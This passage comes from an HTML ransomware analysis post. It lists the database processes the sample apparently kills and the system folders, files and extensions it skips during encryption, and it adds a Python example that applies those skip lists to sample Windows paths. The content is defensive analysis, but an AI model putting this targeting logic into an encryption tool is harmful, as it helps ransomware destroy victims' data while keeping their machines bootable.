<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">isqlplussvc.exe</span></div>
<div dir="ltr" style="line-height: 1.3679999999999999; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">agntsvc.exe</span></div>
<div dir="ltr" style="line-height: 1.3679999999999999; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">sql.exe</span></div>
<div dir="ltr" style="line-height: 1.3679999999999999; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">sqld.exe</span></div>
<div dir="ltr" style="line-height: 1.3679999999999999; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">mysql.exe</span></div>
<div dir="ltr" style="line-height: 1.3679999999999999; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">mysqld.exe</span></div>
<div dir="ltr" style="line-height: 1.3679999999999999; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">oracle.exe</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "georgia"; font-size: 13.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="214" src="https://lh3.googleusercontent.com/pop1alWWtghKcTl30LqVLM7a8MHqW92ILN8iV4IjTw1FV0CbIUoTZOei_L3umnTviAD8Q2Q3g1Y7IkB7oc6uKaFHTFJPvCkhr9IHB8xcUcvx10yQyaojEXClFu5WtKo_pYPRntw_" style="border: none;" width="656" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">After that, it scans for the system folders, files, and file extensions to avoid their encryption which can lead to destroying the system.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="margin-left: -0.75pt;">
<table style="border-collapse: collapse; border: none;"><colgroup><col width="123"></col><col width="196"></col><col width="138"></col><col width="197"></col></colgroup><tbody>
<tr style="height: 117pt;"><td style="border-bottom: solid #ffffff 1pt; border-left: solid #ffffff 1pt; border-right: solid #ffffff 1pt; border-top: solid #ffffff 1pt; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">windows</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">recycle.bin</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">mozilla</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">google</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">boot</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">application data</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">appdata</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">program files</span></div>
</td><td style="border-bottom: solid #ffffff 1pt; border-left: solid #ffffff 1pt; border-right: solid #ffffff 1pt; border-top: solid #ffffff 1pt; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">program files (x86)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">programme</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">programme (x86)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">programdata</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">perflogs</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">intel</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">msocache</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">system volume information</span></div>
</td><td style="border-bottom: solid #ffffff 1pt; border-left: solid #ffffff 1pt; border-right: solid #ffffff 1pt; border-top: solid #ffffff 1pt; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">autorun.inf</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">boot.ini</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">bootfont.bin</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">bootsect.bak</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">desktop.ini</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">iconcache.db</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">ntldr</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">ntuser.dat</span></div>
</td><td style="border-bottom: solid #ffffff 1pt; border-left: solid #ffffff 1pt; border-right: solid #ffffff 1pt; border-top: solid #ffffff 1pt; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">ntuser.dat.log</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">ntuser.ini</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">bootmgr</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">bootnxt</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">thumbs.db</span></div>
</td></tr>
</tbody></table>
</div>
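<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">The lists are easier to reason about as a filter over a file tree. The following Python is an added example, not code from the sample or from this post: it applies a subset of the directory and file-name lists above and of the extension list that follows to a constructed set of Windows paths and reports why each one would be left alone. The subsets embedded in the code are constructed sample data (the page's lists are longer), and the matching rules are assumptions made for illustration: directory names as case-insensitive substrings of the parent path (which is why a bare "recycle.bin" also covers "$Recycle.Bin"), file names as case-insensitive exact matches, and extensions as case-sensitive exact matches, since the list carries both the lower- and upper-case spelling of each suffix.</div>

```python
"""Apply a ransomware-style skip list to Windows paths.

Added example, not code from the analysed sample or from the post.
The matching rules below are assumptions; the page only shows the lists.
"""
from pathlib import PureWindowsPath
from typing import List, Optional

# Subsets of the three lists shown on the page (constructed sample data).
# Tuples keep the lookup order deterministic.
SKIP_DIRS = (
    "windows", "recycle.bin", "mozilla", "google", "boot", "application data",
    "appdata", "program files", "program files (x86)", "programdata",
    "perflogs", "intel", "msocache", "system volume information",
)
SKIP_NAMES = {
    "autorun.inf", "boot.ini", "bootfont.bin", "bootsect.bak", "desktop.ini",
    "iconcache.db", "ntldr", "ntuser.dat", "ntuser.dat.log", "ntuser.ini",
    "bootmgr", "bootnxt", "thumbs.db",
}
# Both spellings of every suffix are listed on the page; that only matters if
# the comparison is case-sensitive, which is what this example assumes.
SKIP_EXTS = {
    ".386", ".adv", ".ADV", ".bat", ".BAT", ".bin", ".BIN", ".cmd", ".CMD",
    ".com", ".COM", ".dll", ".DLL", ".exe", ".EXE", ".lnk", ".LNK",
    ".msc", ".MSC", ".scr", ".SCR",
}


def skip_reason(path: str) -> Optional[str]:
    """Return why `path` would be skipped, or None if it is in scope.

    Assumed rules (not documented on the page):
      * directory names: case-insensitive substring match on the parent path;
      * file names: case-insensitive exact match on the base name;
      * extensions: case-sensitive exact match on the suffix.
    """
    p = PureWindowsPath(path)
    parent = str(p.parent).lower()
    for d in SKIP_DIRS:
        if d in parent:
            return f"dir:{d}"
    if p.name.lower() in SKIP_NAMES:
        return f"name:{p.name.lower()}"
    if p.suffix in SKIP_EXTS:
        return f"ext:{p.suffix}"
    return None


def in_scope(paths: List[str]) -> List[str]:
    """Paths that pass every skip check, in input order."""
    return [p for p in paths if skip_reason(p) is None]


# Constructed sample tree; none of these paths come from the post.
SAMPLE_TREE = [
    r"C:\Users\alice\Documents\report.docx",
    r"C:\Windows\System32\kernel32.dll",
    r"C:\$Recycle.Bin\S-1-5-21-1\old.txt",
    r"C:\Users\alice\Desktop\desktop.ini",
    r"C:\Users\alice\Downloads\setup.exe",
    r"C:\Users\alice\Downloads\setup.Exe",   # mixed case: not in the list
    r"C:\Users\alice\Intelligence\notes.txt",  # "intel" substring over-matches
    r"C:\Program Files\app\data.bin",
    r"C:\ntldr",
    r"C:\Users\alice\Pictures\photo.jpg",
]

if __name__ == "__main__":
    for path in SAMPLE_TREE:
        print(f"{skip_reason(path) or 'TARGET':<22} {path}")
```

<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">Two consequences of the assumed rules are worth checking against the real sample: a file with a mixed-case suffix such as setup.Exe is not excluded if the extension comparison is case-sensitive, and substring matching on directory names over-matches, so a user folder named "Intelligence" is skipped because it contains "intel".</div>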
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "georgia"; font-size: 13.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="250" src="https://lh3.googleusercontent.com/JVaL4nsukDhvgXLJj85FCZY2pK6Zsl6AIX3qU17tawz4uu6N2Asy0GFd59cW6UZswxoMEZFuXyT4YUp-84384uKIE2CKViD1ZlYlw7rYO_2ZOSVtVfhrMtmO-LYDmJigAo_vgc5p" style="border: none;" width="667" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "georgia"; font-size: 13.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="316" src="https://lh3.googleusercontent.com/neV-xbdCJRbkEez_1WUXM_FFoh3VSzvpFYjOI5yCKW1ZLIdt37CGZ-v4ODc2TTVkdEX6NPVfxfEd7LTsiN6ErifM6LiGJjupaT6SmKEvaE5Nu3-ssQBFr7bzGv2vueAOubXR3YOH" style="border: none;" width="624" /></span></div>
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none; width: 468pt;"><colgroup><col width="*"></col><col width="*"></col><col width="*"></col><col width="*"></col></colgroup><tbody>
<tr style="height: 303pt;"><td style="border-bottom: solid #ffffff 1pt; border-left: solid #ffffff 1pt; border-right: solid #ffffff 1pt; border-top: solid #ffffff 1pt; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.386</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.adv</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.ADV</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.ani</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.ANI</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.bat</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.BAT</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.bin</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.BIN</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.cab</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.CAB</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.cmd</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.CMD</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.com</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.COM</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.cpl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.CPL</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.cur</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.CUR</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.deskthemepack</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.DESKTHEMEPACK</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.diagcab</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.DIAGCAB</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.diagcfg</span></div>
</td><td style="border-bottom: solid #ffffff 1pt; border-left: solid #ffffff 1pt; border-right: solid #ffffff 1pt; border-top: solid #ffffff 1pt; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.DIAGCFG</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.diagpkg</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.DIAGPKG</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.dll</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.DLL</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.drv</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.DRV</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.exe</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.EXE</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.hlp</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.HLP</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.icl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.ICL</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.icns</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.ICNS</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.ico</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.ICO</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.ics</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.ICS</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.idx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.IDX</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
